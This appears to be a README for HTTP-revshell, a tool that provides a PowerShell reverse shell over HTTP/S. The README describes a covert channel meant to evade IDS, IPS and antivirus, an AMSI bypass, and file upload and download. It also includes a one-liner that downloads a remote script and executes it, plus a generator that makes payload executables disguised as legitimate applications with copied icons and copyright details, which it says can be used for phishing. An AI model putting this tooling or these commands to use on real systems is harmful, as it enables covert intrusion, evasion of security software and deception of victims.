HTTP-revshell is a tool focused on redteam exercises and pentesters. This tool provides a reverse connection through the http/s protocol. It use a covert channel to gain control over the victim machine through web requests and thus evade solutions such as IDS, IPS and AV.
Help server.py (unisession server)
usage: server.py [-h] [--ssl] [--autocomplete] host port
Process some integers.
host Listen Host
port Listen Port
-h, --help show this help message and exit
--ssl Send traffic over ssl
--autocomplete Autocomplete powershell functions
Help Invoke-WebRev.ps1 (client)
Invoke-WebRev -ip IP -port PORT [-ssl]
git clone https://github.com/3v4Si0N/HTTP-revshell.git
pip3 install -r requirements.txt
Quick start server-multisession.py (multisession server)
This server allows multiple connection of clients.IMPORTANT: To change the session press CTRL+d to exit the current session without closing it.
There is a menu with three basic commands: sessions, interact and exit
- sessions --> show currently active sessions
- interact --> interacts with a session (Example: interact <session_id>)
- exit --> close the application
- Proxy Aware
- Upload Function
- Download Function
- Error Control
- AMSI bypass
- Multiple sessions [only server-multisession.py]
- Autocomplete PowerShell functions (optional) [only server.py]
Extra functions usage
- upload /src/path/file C:\dest\path\file
- download C:\src\path\file /dst/path/file
Help Revshell-Generator.ps1 (Automatic Payload Generator)
This script allows you to create an executable file with the payload necessary to use HTTP-revshell, you just need to follow the instructions on the screen to generate it. There are 6 predefined templates and a customizable one, with the data that you like.
The payloads generated by the tool, incorporate the legitimate icon of the application, as well as the product and copyright information of the original application. In addition, each of them opens the original application before establishing the connection with the server, pretending to be a legitimate application. This can be used for phishing or Red Team exercises.
Payload Generator usage:
iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/Revshell-Generator.ps1 | iex
- JoelGMSec for his awesome Revshell-Generator.ps1. Twitter: @JoelGMSec
- dev-2null for report the first bug. Twitter: @dev2null